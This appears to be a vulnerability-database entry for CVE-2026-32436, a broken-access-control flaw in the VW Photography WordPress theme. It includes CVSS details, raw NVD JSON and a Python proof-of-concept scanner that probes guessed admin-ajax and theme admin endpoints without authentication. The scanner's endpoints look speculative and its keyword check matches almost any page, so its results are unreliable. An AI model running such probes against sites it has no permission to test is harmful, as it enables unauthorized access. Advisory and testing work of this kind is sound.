Security Vulnerability Report
中文
CVE-2026-32436 CVSS 5.3 MEDIUM

CVE-2026-32436

Published: 2026-03-13 19:55:04
Last Modified: 2026-04-29 10:17:10

Description

Missing Authorization vulnerability in vowelweb VW Photography vw-photography allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Photography: from n/a through <= 1.3.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

vowelweb VW Photography WordPress Theme <= 1.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32436 VW Photography Authorization Bypass PoC # Target: WordPress sites with VW Photography theme <= 1.3.8 # Author: Security Research Team # Note: Use responsibly and only on systems you have permission to test import requests import sys from urllib.parse import urljoin def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2026-32436""" # Common VW Photography endpoints that require authorization vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=get_gallery_items', '/wp-admin/admin-ajax.php?action=vw_photography_settings', '/wp-admin/admin-ajax.php?action=save_portfolio', '/wp-admin/admin-ajax.php?action=delete_album', '/wp-content/themes/vw-photography/admin/dashboard.php', '/wp-content/themes/vw-photography/admin/ajax-handler.php' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-32436 Authorization Bypass Test\n") headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/html, */*' } vulnerable = False for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) try: response = requests.get(full_url, headers=headers, timeout=10, verify=False) # Check if we get unauthorized access (200 OK without auth) if response.status_code == 200: # Check response content for sensitive data if any(keyword in response.text.lower() for keyword in ['admin', 'settings', 'config', 'user', 'password', 'gallery']): print(f"[+] VULNERABLE: {endpoint}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") vulnerable = True else: print(f"[*] Potentially vulnerable: {endpoint}") elif response.status_code == 403: print(f"[-] Protected: {endpoint} (403 Forbidden)") else: print(f"[*] Endpoint: {endpoint} (Status: {response.status_code})") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") if vulnerable: print("\n[!] Target appears to be VULNERABLE to CVE-2026-32436") print("[!] Recommendation: Update VW Photography theme to latest version") else: print("\n[*] Target does not appear to be vulnerable") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32436_poc.py <target_url>") print("Example: python cve-2026-32436_poc.py http://example.com") sys.exit(1) target = sys.argv[1] if not target.startswith('http'): target = 'http://' + target check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32436", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:03.603", "lastModified": "2026-04-29T10:17:10.123", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in vowelweb VW Photography vw-photography allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Photography: from n/a through <= 1.3.8."}, {"lang": "es", "value": "Vulnerabilidad por Autorización Ausente en vowelweb VW Photography vw-photography permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a VW Photography: desde n/a hasta &lt;= 1.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/vw-photography/vulnerability/wordpress-vw-photography-theme-1-3-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}